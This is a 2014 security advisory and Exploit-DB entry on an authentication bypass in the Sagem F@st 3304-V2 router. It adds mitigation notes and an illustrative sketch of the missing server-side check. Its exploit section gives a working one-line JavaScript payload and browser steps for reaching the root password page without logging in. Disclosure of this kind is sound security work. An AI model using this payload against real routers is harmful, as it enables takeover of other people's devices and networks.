Vendor: Sagem F@st 3304-V2
By: Yassine Aboukir
CVSS: 7.5 (HIGH)
CWE: Authentication Bypass
Product Name: Sagem F@st 3304-V2
Patch Exists: NO
Platforms Tested: Firefox, Google Chrome, Internet Explorer
Year: 2014

Sagem F@st 3304-V2 Authentication Bypass

The Sagem Fast 3304-V2 router is vulnerable to an authentication bypass bug which allows unprivileged users to modify the preconfigured root password and then log in with administrator permissions. The vulnerability can be exploited by running JavaScript code in the web browser's URL bar. The default URL to access the web management interface is http://192.168.1.1, but this attack can also be performed by an external attacker who connects to the router's public IP address.

Mitigation:

The vendor should release a patch to fix the authentication bypass vulnerability. In the meantime, users can mitigate the risk by changing the default root password and regularly updating the router's firmware.
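
The flaw described here is a server that hands the password change page to a browser that never logged in. The sketch below is an added illustration, not Sagemcom firmware and not code from the original advisory: it models page-by-id navigation with the check missing and then with server-side, default-deny authorization. Only the id 9096 comes from the advisory; page id 1, the page names and all function names are assumptions.

```javascript
// Constructed model: 9096 is the page id from the advisory; id 1, the page
// names and every function name here are hypothetical.
const PAGES = new Map([
  [1,    { name: "login", public: true }],
  [9096, { name: "password-change" }],   // no "public" flag: auth required
]);

// `session` is what the server resolved from the request's cookie, or null.
function sessionValid(session, now) {
  return Boolean(session) && session.authenticated === true && now < session.expires;
}

// Weak form: the server assumes only its own buttons issue "goto" requests
// and returns whichever page id the browser names.
function gotoWeak(session, pageId) {
  const page = PAGES.get(pageId);
  return page ? { status: 200, page: page.name } : { status: 404 };
}

// Hardened form: default-deny, decided on the server for every request,
// no matter how the request was produced in the browser.
function gotoHardened(session, pageId, now) {
  const page = PAGES.get(pageId);
  if (!page) return { status: 404 };
  if (page.public !== true && !sessionValid(session, now)) {
    return { status: 302, page: "login" };   // back to the login page
  }
  return { status: 200, page: page.name };
}

// The state change itself is gated too and asks for the current password,
// so reaching the form is never sufficient to replace the credential.
// `verifyCurrent` stands in for the device's own password check.
function submitPasswordChange(session, form, verifyCurrent, now) {
  if (!sessionValid(session, now)) return { status: 302, page: "login" };
  if (!verifyCurrent(form.current)) return { status: 403 };
  return { status: 200, page: "password-updated" };
}
```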

Exploit-DB raw data:

# Title              : Sagem F@st 3304-V2 Authentication Bypass
# Vendor             : http://www.sagemcom.com
# Severity           : High
# Tested on          : Firefox, Google Chrome, Internet Explorer
# Tested Router      : Sagem F@st 3304-V2 (3304, 3464, 3504 may also be affected)
# Date               : 2014-09-04
# Author             : Yassine Aboukir
# Contact            : Yaaboukir@gmail.com
# Blog               : http://linkedin.com/pub/yassine-aboukir/43/900/1b3
-----------

# Vulnerability description :
Sagem Fast is an ADSL router that uses a web management interface to change configuration settings. The router is vulnerable to an authentication bypass bug which allows unprivileged users to modify the preconfigured root password and then log in with administrator permissions.
The default URL to access the web management interface is http://192.168.1.1, but this attack can also be performed by an external attacker who connects to the router's public IP address.

# Exploit :
The vulnerability can be exploited by running JavaScript code in the web browser's URL bar, which gives access to the password change page without permission to do so.
--- Using Chrome or Internet Explorer :
You first need to access the router login page http://192.168.1.1/ (without logging in).
Then execute the following JavaScript in the URL bar : javascript:mimic_button('goto: 9096..')

--- Using Firefox : 
Because running JavaScript in the URL bar has been disabled in Mozilla Firefox, another way is needed :
You first need to access the router login page http://192.168.1.1/ (without logging in).

1st Method : 
You have to bookmark the javascript: link before it can be executed.
---- Show all Bookmarks (Ctrl+Shift+B)
---- Select folder (e.g. Bookmarks Toolbar)
---- Click Organize -> New Bookmark... and enter javascript:mimic_button('goto: 9096..') in the address field.

2nd Method :
Use the Web Console tool (CTRL + SHIFT + K), in which you can interpret JavaScript expressions in real time using the command line it provides.